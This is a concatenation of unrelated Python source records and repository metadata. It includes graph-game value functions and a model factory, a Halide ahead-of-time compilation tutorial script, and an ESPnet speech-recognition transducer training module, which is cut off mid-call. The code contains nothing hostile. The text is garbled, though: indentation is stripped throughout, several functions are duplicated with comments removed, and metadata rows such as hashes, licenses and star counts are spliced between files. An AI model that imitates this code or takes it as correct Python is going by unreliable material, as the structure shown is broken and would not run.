def get_candidates(player, labels, graph_mat):
n = len(labels)
candidates = []
s = sum([player == l for l in labels])
for i in range(n):
if labels[i] == 0 and (s == 0 or sum([labels[j] == player for j in range(n) if graph_mat[i, j] > 0])):
candidates.append(i)
return candidates
def bfs(f, mat):
n = len(f)
g = [i for i in range(n) if f[i] == 0]
while g:
t = g[0]
for i in range(n):
if mat[t, i] > 0:
if f[i] > f[t] + 1:
f[i] = f[t] + 1
g.append(i)
g = g[1:]
return f
def value_func0(player, labels, graph_mat, graph_dis):
n = len(labels)
g = [[], [], []]
for i in range(n):
g[labels[i]].append(i)
s = 0
for l0 in g[0]:
min1 = min([n]+[graph_dis[i, l0] for i in g[1]])
min2 = min([n]+[graph_dis[i, l0] for i in g[2]])
if min1 < min2:
s += (player == 1)
if min1 > min2:
s += (player == 2)
return s
def value_func1(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = 0
for i in range(n):
if labels[i] == 0:
if self_f[i] < oppo_f[i]:
s += 1
if self_f[i] > oppo_f[i]:
s -= 1
return s
def value_func2(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = sum([-self_f[i]+oppo_f[i] for i in range(n) if labels[i] == 0])
return s
value_funcs = [value_func0, value_func1, value_func2]
| 29.00885
| 110
| 0.527761
|
from model.random_model import RandomModel
from model.greedy_model import GreedyModel
from model.min_max_model import MinMaxModel
from model.alpha_beta_model import AlphaBetaModel
from model.sprague_grundy_model import SpragueGrundyModel
from model.fully_connected_network_model import FCNModel
import config
def name_to_model(s, env):
s = s.lower()
assert s in config.model_list
model = None
if s == 'random':
model = RandomModel(env)
if s == 'greedy-p0':
model = GreedyModel(env, 0)
if s == 'greedy-p1':
model = GreedyModel(env, 1)
if s == 'greedy-p2':
model = GreedyModel(env, 2)
if s == 'minmax-p0':
model = MinMaxModel(env, 0)
if s == 'minmax-p1':
model = MinMaxModel(env, 1)
if s == 'minmax-p2':
model = MinMaxModel(env, 2)
if s == 'ab-p0':
model = AlphaBetaModel(env, 0)
if s == 'ab-p1':
model = AlphaBetaModel(env, 1)
if s == 'ab-p2':
model = AlphaBetaModel(env, 2)
if s == 'sg':
model = SpragueGrundyModel(env)
if s == 'fcn':
model = FCNModel(env)
model.name = s
return model
def get_candidates(player, labels, graph_mat):
n = len(labels)
candidates = []
s = sum([player == l for l in labels])
for i in range(n):
if labels[i] == 0 and (s == 0 or sum([labels[j] == player for j in range(n) if graph_mat[i, j] > 0])):
candidates.append(i)
return candidates
def bfs(f, mat):
n = len(f)
g = [i for i in range(n) if f[i] == 0]
while g:
t = g[0]
for i in range(n):
if mat[t, i] > 0:
if f[i] > f[t] + 1:
f[i] = f[t] + 1
g.append(i)
g = g[1:]
return f
def value_func0(player, labels, graph_mat, graph_dis):
n = len(labels)
g = [[], [], []]
for i in range(n):
g[labels[i]].append(i)
s = 0
for l0 in g[0]:
min1 = min([n]+[graph_dis[i, l0] for i in g[1]])
min2 = min([n]+[graph_dis[i, l0] for i in g[2]])
if min1 < min2:
s += (player == 1)
if min1 > min2:
s += (player == 2)
return s
def value_func1(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = 0
for i in range(n):
if labels[i] == 0:
if self_f[i] < oppo_f[i]:
s += 1
if self_f[i] > oppo_f[i]:
s -= 1
return s
def value_func2(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = sum([-self_f[i]+oppo_f[i] for i in range(n) if labels[i] == 0])
return s
value_funcs = [value_func0, value_func1, value_func2]
| true
| true
|
1c3eb15d7da6787510d8cb568e87d91b919b684c
| 2,109
|
py
|
Python
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 4,303
|
2015-01-02T12:04:37.000Z
|
2022-03-31T11:35:06.000Z
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 4,323
|
2015-01-01T13:31:25.000Z
|
2022-03-31T22:43:57.000Z
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 1,032
|
2015-01-12T12:50:16.000Z
|
2022-03-28T01:55:11.000Z
|
# Before reading this file, see lesson_10_aot_compilation_generate.py
# This is the code that actually uses the Halide pipeline we've
# compiled. It does not depend on libHalide, so we won't do
# "import halide".
#
# Instead, it depends on the header file that lesson_10_generate
# produced when we ran it:
import lesson_10_halide
import numpy as np
def main():
# Have a look at the generated files above (they won't exist until you've run
# lesson_10_generate): lesson_10_halide.py.cpp, lesson_10_halide.h
#
# In the header file, the generated function is represented like this:
# int lesson_10_halide(halide_buffer_t*, uint8_t, halide_buffer_t*);
#
# lesson_10_halide.py.cpp creates a Python wrapper around this function.
# Buffers are converted using the Python buffer API:
#
# https://docs.python.org/2/c-api/buffer.html
# https://docs.python.org/3/c-api/buffer.html
#
# In other words, you can pass numpy arrays directly to the generated
# code.
# Let's make some input data to test with:
input = np.empty((640, 480), dtype=np.uint8, order='F')
for y in range(480):
for x in range(640):
input[x, y] = x ^ (y + 1)
# And the memory where we want to write our output:
output = np.empty((640, 480), dtype=np.uint8, order='F')
offset_value = 5
lesson_10_halide.lesson_10_halide(input, offset_value, output)
# Now let's check the filter performed as advertised. It was
# supposed to add the offset to every input pixel.
correct_val = np.empty((1), dtype=np.uint8)
for y in range(480):
for x in range(640):
input_val = input[x, y]
output_val = output[x, y]
correct_val[0] = input_val
# we add over a uint8 value (will properly model overflow)
correct_val[0] += offset_value
assert output_val == correct_val[0], \
"output(%d, %d) was %d instead of %d" % (x, y, output_val, correct_val)
# Everything worked!
print("Success!")
return 0
if __name__ == "__main__":
main()
| 33.47619
| 87
| 0.656235
|
# compiled. It does not depend on libHalide, so we won't do
import lesson_10_halide
import numpy as np
def main():
input = np.empty((640, 480), dtype=np.uint8, order='F')
for y in range(480):
for x in range(640):
input[x, y] = x ^ (y + 1)
# And the memory where we want to write our output:
output = np.empty((640, 480), dtype=np.uint8, order='F')
offset_value = 5
lesson_10_halide.lesson_10_halide(input, offset_value, output)
# Now let's check the filter performed as advertised. It was
correct_val = np.empty((1), dtype=np.uint8)
for y in range(480):
for x in range(640):
input_val = input[x, y]
output_val = output[x, y]
correct_val[0] = input_val
correct_val[0] += offset_value
assert output_val == correct_val[0], \
"output(%d, %d) was %d instead of %d" % (x, y, output_val, correct_val)
print("Success!")
return 0
if __name__ == "__main__":
main()
| true
| true
|
1c3eb3b6d07c2dc5556bce9a07ea0abe005bbfa9
| 52,497
|
py
|
Python
|
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Training/decoding definition for the speech recognition task."""
import copy
import json
import logging
import math
import os
import sys
from chainer import reporter as reporter_module
from chainer import training
from chainer.training import extensions
from chainer.training.updater import StandardUpdater
import numpy as np
from tensorboardX import SummaryWriter
import torch
from torch.nn.parallel import data_parallel
from espnet.asr.asr_utils import adadelta_eps_decay
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.asr_utils import CompareValueTrigger
from espnet.asr.asr_utils import format_mulenc_args
from espnet.asr.asr_utils import get_model_conf
from espnet.asr.asr_utils import plot_spectrogram
from espnet.asr.asr_utils import restore_snapshot
from espnet.asr.asr_utils import snapshot_object
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import torch_resume
from espnet.asr.asr_utils import torch_snapshot
from espnet.asr.pytorch_backend.asr_init_rnn_t import freeze_modules
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_model
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_modules
import espnet.lm.pytorch_backend.extlm as extlm_pytorch
from espnet.nets.asr_interface import ASRInterface
from espnet.nets.beam_search_transducer import BeamSearchTransducer
from espnet.nets.pytorch_backend.e2e_asr import pad_list
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.nets.pytorch_backend.streaming.segment import SegmentStreamingE2E
from espnet.nets.pytorch_backend.streaming.window import WindowStreamingE2E
from espnet.transform.spectrogram import IStft
from espnet.transform.transformation import Transformation
from espnet.utils.cli_writers import file_writer_helper
from espnet.utils.dataset import ChainerDataLoader
from espnet.utils.dataset import TransformDataset
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.utils.dynamic_import import dynamic_import
from espnet.utils.io_utils import LoadInputsAndTargets
from espnet.utils.training.batchfy import make_batchset
from espnet.utils.training.evaluator import BaseEvaluator
from espnet.utils.training.iterators import ShufflingEnabler
from espnet.utils.training.tensorboard_logger import TensorboardLogger
from espnet.utils.training.train_utils import check_early_stop
from espnet.utils.training.train_utils import set_early_stop
import matplotlib
matplotlib.use("Agg")
if sys.version_info[0] == 2:
from itertools import izip_longest as zip_longest
else:
from itertools import zip_longest as zip_longest
def _recursive_to(xs, device):
if torch.is_tensor(xs):
return xs.to(device)
if isinstance(xs, tuple):
return tuple(_recursive_to(x, device) for x in xs)
return xs
class CustomEvaluator(BaseEvaluator):
"""Custom Evaluator for Pytorch.
Args:
model (torch.nn.Module): The model to evaluate.
iterator (chainer.dataset.Iterator) : The train iterator.
target (link | dict[str, link]) :Link object or a dictionary of
links to evaluate. If this is just a link object, the link is
registered by the name ``'main'``.
device (torch.device): The device used.
ngpu (int): The number of GPUs.
"""
def __init__(self, model, iterator, target, device, ngpu=None):
super(CustomEvaluator, self).__init__(iterator, target)
self.model = model
self.device = device
if ngpu is not None:
self.ngpu = ngpu
elif device.type == "cpu":
self.ngpu = 0
else:
self.ngpu = 1
# The core part of the update routine can be customized by overriding
def evaluate(self):
"""Main evaluate routine for CustomEvaluator."""
iterator = self._iterators["main"]
if self.eval_hook:
self.eval_hook(self)
if hasattr(iterator, "reset"):
iterator.reset()
it = iterator
else:
it = copy.copy(iterator)
summary = reporter_module.DictSummary()
self.model.eval()
with torch.no_grad():
for batch in it:
x = _recursive_to(batch, self.device)
observation = {}
with reporter_module.report_scope(observation):
# read scp files
# x: original json with loaded features
# will be converted to chainer variable later
if self.ngpu == 0:
self.model(*x)
else:
# apex does not support torch.nn.DataParallel
data_parallel(self.model, x, range(self.ngpu))
summary.add(observation)
self.model.train()
return summary.compute_mean()
class CustomUpdater(StandardUpdater):
"""Custom Updater for Pytorch.
Args:
model (torch.nn.Module): The model to update.
grad_clip_threshold (float): The gradient clipping value to use.
train_iter (chainer.dataset.Iterator): The training iterator.
optimizer (torch.optim.optimizer): The training optimizer.
device (torch.device): The device to use.
ngpu (int): The number of gpus to use.
use_apex (bool): The flag to use Apex in backprop.
"""
def __init__(
self,
model,
grad_clip_threshold,
train_iter,
optimizer,
device,
ngpu,
grad_noise=False,
accum_grad=1,
use_apex=False,
):
super(CustomUpdater, self).__init__(train_iter, optimizer)
self.model = model
self.grad_clip_threshold = grad_clip_threshold
self.device = device
self.ngpu = ngpu
self.accum_grad = accum_grad
self.forward_count = 0
self.grad_noise = grad_noise
self.iteration = 0
self.use_apex = use_apex
# The core part of the update routine can be customized by overriding.
def update_core(self):
"""Main update routine of the CustomUpdater."""
# When we pass one iterator and optimizer to StandardUpdater.__init__,
# they are automatically named 'main'.
train_iter = self.get_iterator("main")
optimizer = self.get_optimizer("main")
epoch = train_iter.epoch
# Get the next batch (a list of json files)
batch = train_iter.next()
# self.iteration += 1 # Increase may result in early report,
# which is done in other place automatically.
x = _recursive_to(batch, self.device)
is_new_epoch = train_iter.epoch != epoch
# When the last minibatch in the current epoch is given,
# gradient accumulation is turned off in order to evaluate the model
# on the validation set in every epoch.
# see details in https://github.com/espnet/espnet/pull/1388
# Compute the loss at this time step and accumulate it
if self.ngpu == 0:
loss = self.model(*x).mean() / self.accum_grad
else:
# apex does not support torch.nn.DataParallel
loss = (
data_parallel(self.model, x, range(self.ngpu)).mean() / self.accum_grad
)
if self.use_apex:
from apex import amp
# NOTE: for a compatibility with noam optimizer
opt = optimizer.optimizer if hasattr(optimizer, "optimizer") else optimizer
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
# gradient noise injection
if self.grad_noise:
from espnet.asr.asr_utils import add_gradient_noise
add_gradient_noise(
self.model, self.iteration, duration=100, eta=1.0, scale_factor=0.55
)
# update parameters
self.forward_count += 1
if not is_new_epoch and self.forward_count != self.accum_grad:
return
self.forward_count = 0
# compute the gradient norm to check if it is normal or not
grad_norm = torch.nn.utils.clip_grad_norm_(
self.model.parameters(), self.grad_clip_threshold
)
logging.info("grad norm={}".format(grad_norm))
if math.isnan(grad_norm):
logging.warning("grad norm is nan. Do not update model.")
else:
optimizer.step()
optimizer.zero_grad()
def update(self):
self.update_core()
# #iterations with accum_grad > 1
# Ref.: https://github.com/espnet/espnet/issues/777
if self.forward_count == 0:
self.iteration += 1
class CustomConverter(object):
"""Custom batch converter for Pytorch.
Args:
subsampling_factor (int): The subsampling factor.
dtype (torch.dtype): Data type to convert.
"""
def __init__(self, subsampling_factor=1, dtype=torch.float32):
"""Construct a CustomConverter object."""
self.subsampling_factor = subsampling_factor
self.ignore_id = -1
self.dtype = dtype
def __call__(self, batch, device=torch.device("cpu")):
"""Transform a batch and send it to a device.
Args:
batch (list): The batch to transform.
device (torch.device): The device to send to.
Returns:
tuple(torch.Tensor, torch.Tensor, torch.Tensor)
"""
# batch should be located in list
assert len(batch) == 1
xs, ys = batch[0]
# perform subsampling
if self.subsampling_factor > 1:
xs = [x[:: self.subsampling_factor, :] for x in xs]
# get batch of lengths of input sequences
ilens = np.array([x.shape[0] for x in xs])
# perform padding and convert to tensor
# currently only support real number
if xs[0].dtype.kind == "c":
xs_pad_real = pad_list(
[torch.from_numpy(x.real).float() for x in xs], 0
).to(device, dtype=self.dtype)
xs_pad_imag = pad_list(
[torch.from_numpy(x.imag).float() for x in xs], 0
).to(device, dtype=self.dtype)
# Note(kamo):
# {'real': ..., 'imag': ...} will be changed to ComplexTensor in E2E.
# Don't create ComplexTensor and give it E2E here
# because torch.nn.DataParellel can't handle it.
xs_pad = {"real": xs_pad_real, "imag": xs_pad_imag}
else:
xs_pad = pad_list([torch.from_numpy(x).float() for x in xs], 0).to(
device, dtype=self.dtype
)
ilens = torch.from_numpy(ilens).to(device)
# NOTE: this is for multi-output (e.g., speech translation)
ys_pad = pad_list(
[
torch.from_numpy(
np.array(y[0][:]) if isinstance(y, tuple) else y
).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_pad, ilens, ys_pad
class CustomConverterMulEnc(object):
"""Custom batch converter for Pytorch in multi-encoder case.
Args:
subsampling_factors (list): List of subsampling factors for each encoder.
dtype (torch.dtype): Data type to convert.
"""
def __init__(self, subsamping_factors=[1, 1], dtype=torch.float32):
"""Initialize the converter."""
self.subsamping_factors = subsamping_factors
self.ignore_id = -1
self.dtype = dtype
self.num_encs = len(subsamping_factors)
def __call__(self, batch, device=torch.device("cpu")):
"""Transform a batch and send it to a device.
Args:
batch (list): The batch to transform.
device (torch.device): The device to send to.
Returns:
tuple( list(torch.Tensor), list(torch.Tensor), torch.Tensor)
"""
# batch should be located in list
assert len(batch) == 1
xs_list = batch[0][: self.num_encs]
ys = batch[0][-1]
# perform subsampling
if np.sum(self.subsamping_factors) > self.num_encs:
xs_list = [
[x[:: self.subsampling_factors[i], :] for x in xs_list[i]]
for i in range(self.num_encs)
]
# get batch of lengths of input sequences
ilens_list = [
np.array([x.shape[0] for x in xs_list[i]]) for i in range(self.num_encs)
]
# perform padding and convert to tensor
# currently only support real number
xs_list_pad = [
pad_list([torch.from_numpy(x).float() for x in xs_list[i]], 0).to(
device, dtype=self.dtype
)
for i in range(self.num_encs)
]
ilens_list = [
torch.from_numpy(ilens_list[i]).to(device) for i in range(self.num_encs)
]
# NOTE: this is for multi-task learning (e.g., speech translation)
ys_pad = pad_list(
[
torch.from_numpy(np.array(y[0]) if isinstance(y, tuple) else y).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_list_pad, ilens_list, ys_pad
def train(args):
"""Train with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
if args.num_encs > 1:
args = format_mulenc_args(args)
# check cuda availability
if not torch.cuda.is_available():
logging.warning("cuda is not available")
# get input and output dimension info
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
utts = list(valid_json.keys())
idim_list = [
int(valid_json[utts[0]]["input"][i]["shape"][-1]) for i in range(args.num_encs)
]
odim = int(valid_json[utts[0]]["output"][0]["shape"][-1])
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
odim += 1 # for the <mask> token
for i in range(args.num_encs):
logging.info("stream{}: input dims : {}".format(i + 1, idim_list[i]))
logging.info("#output dims: " + str(odim))
# specify attention, CTC, hybrid mode
if "transducer" in args.model_module:
if (
getattr(args, "etype", False) == "transformer"
or getattr(args, "dtype", False) == "transformer"
):
mtl_mode = "transformer_transducer"
else:
mtl_mode = "transducer"
logging.info("Pure transducer mode")
elif args.mtlalpha == 1.0:
mtl_mode = "ctc"
logging.info("Pure CTC mode")
elif args.mtlalpha == 0.0:
mtl_mode = "att"
logging.info("Pure attention mode")
else:
mtl_mode = "mtl"
logging.info("Multitask learning mode")
if (args.enc_init is not None or args.dec_init is not None) and args.num_encs == 1:
model = load_trained_modules(idim_list[0], odim, args)
else:
model_class = dynamic_import(args.model_module)
model = model_class(
idim_list[0] if args.num_encs == 1 else idim_list, odim, args
)
assert isinstance(model, ASRInterface)
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
if args.rnnlm is not None:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(args.char_list), rnnlm_args.layer, rnnlm_args.unit)
)
torch_load(args.rnnlm, rnnlm)
model.rnnlm = rnnlm
# write model config
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
model_conf = args.outdir + "/model.json"
with open(model_conf, "wb") as f:
logging.info("writing a model config file to " + model_conf)
f.write(
json.dumps(
(idim_list[0] if args.num_encs == 1 else idim_list, odim, vars(args)),
indent=4,
ensure_ascii=False,
sort_keys=True,
).encode("utf_8")
)
for key in sorted(vars(args).keys()):
logging.info("ARGS: " + key + ": " + str(vars(args)[key]))
reporter = model.reporter
# check the use of multi-gpu
if args.ngpu > 1:
if args.batch_size != 0:
logging.warning(
"batch size is automatically increased (%d -> %d)"
% (args.batch_size, args.batch_size * args.ngpu)
)
args.batch_size *= args.ngpu
if args.num_encs > 1:
# TODO(ruizhili): implement data parallel for multi-encoder setup.
raise NotImplementedError(
"Data parallel is not supported for multi-encoder setup."
)
# set torch device
device = torch.device("cuda" if args.ngpu > 0 else "cpu")
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(device=device, dtype=dtype)
if args.freeze_mods:
model, model_params = freeze_modules(model, args.freeze_mods)
else:
model_params = model.parameters()
# Setup an optimizer
if args.opt == "adadelta":
optimizer = torch.optim.Adadelta(
model_params, rho=0.95, eps=args.eps, weight_decay=args.weight_decay
)
elif args.opt == "adam":
optimizer = torch.optim.Adam(model_params, weight_decay=args.weight_decay)
elif args.opt == "noam":
from espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt
# For transformer-transducer, adim declaration is within the block definition.
# Thus, we need retrieve the most dominant value (d_hidden) for Noam scheduler.
if hasattr(args, "enc_block_arch") or hasattr(args, "dec_block_arch"):
adim = model.most_dom_dim
else:
adim = args.adim
optimizer = get_std_opt(
model_params, adim, args.transformer_warmup_steps, args.transformer_lr
)
else:
raise NotImplementedError("unknown optimizer: " + args.opt)
# setup apex.amp
if args.train_dtype in ("O0", "O1", "O2", "O3"):
try:
from apex import amp
except ImportError as e:
logging.error(
f"You need to install apex for --train-dtype {args.train_dtype}. "
"See https://github.com/NVIDIA/apex#linux"
)
raise e
if args.opt == "noam":
model, optimizer.optimizer = amp.initialize(
model, optimizer.optimizer, opt_level=args.train_dtype
)
else:
model, optimizer = amp.initialize(
model, optimizer, opt_level=args.train_dtype
)
use_apex = True
from espnet.nets.pytorch_backend.ctc import CTC
amp.register_float_function(CTC, "loss_fn")
amp.init()
logging.warning("register ctc as float function")
else:
use_apex = False
# FIXME: TOO DIRTY HACK
setattr(optimizer, "target", reporter)
setattr(optimizer, "serialize", lambda s: reporter.serialize(s))
# Setup a converter
if args.num_encs == 1:
converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)
else:
converter = CustomConverterMulEnc(
[i[0] for i in model.subsample_list], dtype=dtype
)
# read json data
with open(args.train_json, "rb") as f:
train_json = json.load(f)["utts"]
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
use_sortagrad = args.sortagrad == -1 or args.sortagrad > 0
# make minibatch list (variable length)
train = make_batchset(
train_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
shortest_first=use_sortagrad,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
valid = make_batchset(
valid_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
load_tr = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": True}, # Switch the mode of preprocessing
)
load_cv = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": False}, # Switch the mode of preprocessing
)
# hack to make batchsize argument as 1
# actual bathsize is included in a list
# default collate function converts numpy array to pytorch tensor
# we used an empty collate function instead which returns list
train_iter = ChainerDataLoader(
dataset=TransformDataset(train, lambda data: converter([load_tr(data)])),
batch_size=1,
num_workers=args.n_iter_processes,
shuffle=not use_sortagrad,
collate_fn=lambda x: x[0],
)
valid_iter = ChainerDataLoader(
dataset=TransformDataset(valid, lambda data: converter([load_cv(data)])),
batch_size=1,
shuffle=False,
collate_fn=lambda x: x[0],
num_workers=args.n_iter_processes,
)
# Set up a trainer
updater = CustomUpdater(
model,
args.grad_clip,
{"main": train_iter},
optimizer,
device,
args.ngpu,
args.grad_noise,
args.accum_grad,
use_apex=use_apex,
)
trainer = training.Trainer(updater, (args.epochs, "epoch"), out=args.outdir)
if use_sortagrad:
trainer.extend(
ShufflingEnabler([train_iter]),
trigger=(args.sortagrad if args.sortagrad != -1 else args.epochs, "epoch"),
)
# Resume from a snapshot
if args.resume:
logging.info("resumed from %s" % args.resume)
torch_resume(args.resume, trainer)
# Evaluate the model with the test dataset for each epoch
if args.save_interval_iters > 0:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu)
)
# Save attention weight each epoch
is_attn_plot = (
(
"transformer" in args.model_module
or "conformer" in args.model_module
or mtl_mode in ["att", "mtl"]
)
or (
mtl_mode == "transducer" and getattr(args, "rnnt_mode", False) == "rnnt-att"
)
or mtl_mode == "transformer_transducer"
)
if args.num_save_attention > 0 and is_attn_plot:
data = sorted(
list(valid_json.items())[: args.num_save_attention],
key=lambda x: int(x[1]["input"][0]["shape"][1]),
reverse=True,
)
if hasattr(model, "module"):
att_vis_fn = model.module.calculate_all_attentions
plot_class = model.module.attention_plot_class
else:
att_vis_fn = model.calculate_all_attentions
plot_class = model.attention_plot_class
att_reporter = plot_class(
att_vis_fn,
data,
args.outdir + "/att_ws",
converter=converter,
transform=load_cv,
device=device,
)
trainer.extend(att_reporter, trigger=(1, "epoch"))
else:
att_reporter = None
# Save CTC prob at each epoch
if mtl_mode in ["ctc", "mtl"] and args.num_save_ctc > 0:
# NOTE: sort it by output lengths
data = sorted(
list(valid_json.items())[: args.num_save_ctc],
key=lambda x: int(x[1]["output"][0]["shape"][0]),
reverse=True,
)
if hasattr(model, "module"):
ctc_vis_fn = model.module.calculate_all_ctc_probs
plot_class = model.module.ctc_plot_class
else:
ctc_vis_fn = model.calculate_all_ctc_probs
plot_class = model.ctc_plot_class
ctc_reporter = plot_class(
ctc_vis_fn,
data,
args.outdir + "/ctc_prob",
converter=converter,
transform=load_cv,
device=device,
ikey="output",
iaxis=1,
)
trainer.extend(ctc_reporter, trigger=(1, "epoch"))
else:
ctc_reporter = None
# Make a plot for training and validation values
if args.num_encs > 1:
report_keys_loss_ctc = [
"main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)]
report_keys_cer_ctc = [
"main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)]
trainer.extend(
extensions.PlotReport(
[
"main/loss",
"validation/main/loss",
"main/loss_ctc",
"validation/main/loss_ctc",
"main/loss_att",
"validation/main/loss_att",
]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="loss.png",
)
)
trainer.extend(
extensions.PlotReport(
["main/acc", "validation/main/acc"], "epoch", file_name="acc.png"
)
)
trainer.extend(
extensions.PlotReport(
["main/cer_ctc", "validation/main/cer_ctc"]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="cer.png",
)
)
# Save best models
trainer.extend(
snapshot_object(model, "model.loss.best"),
trigger=training.triggers.MinValueTrigger("validation/main/loss"),
)
if mtl_mode not in ["ctc", "transducer", "transformer_transducer"]:
trainer.extend(
snapshot_object(model, "model.acc.best"),
trigger=training.triggers.MaxValueTrigger("validation/main/acc"),
)
# save snapshot which contains model and optimizer states
if args.save_interval_iters > 0:
trainer.extend(
torch_snapshot(filename="snapshot.iter.{.updater.iteration}"),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(torch_snapshot(), trigger=(1, "epoch"))
# epsilon decay in the optimizer
if args.opt == "adadelta":
if args.criterion == "acc" and mtl_mode != "ctc":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.acc.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
elif args.criterion == "loss":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.loss.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# NOTE: In some cases, it may take more than one epoch for the model's loss
# to escape from a local minimum.
# Thus, restore_snapshot extension is not used here.
# see details in https://github.com/espnet/espnet/pull/2171
elif args.criterion == "loss_eps_decay_only":
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# Write a log of evaluation statistics for each epoch
trainer.extend(
extensions.LogReport(trigger=(args.report_interval_iters, "iteration"))
)
report_keys = [
"epoch",
"iteration",
"main/loss",
"main/loss_ctc",
"main/loss_att",
"validation/main/loss",
"validation/main/loss_ctc",
"validation/main/loss_att",
"main/acc",
"validation/main/acc",
"main/cer_ctc",
"validation/main/cer_ctc",
"elapsed_time",
] + ([] if args.num_encs == 1 else report_keys_cer_ctc + report_keys_loss_ctc)
if args.opt == "adadelta":
trainer.extend(
extensions.observe_value(
"eps",
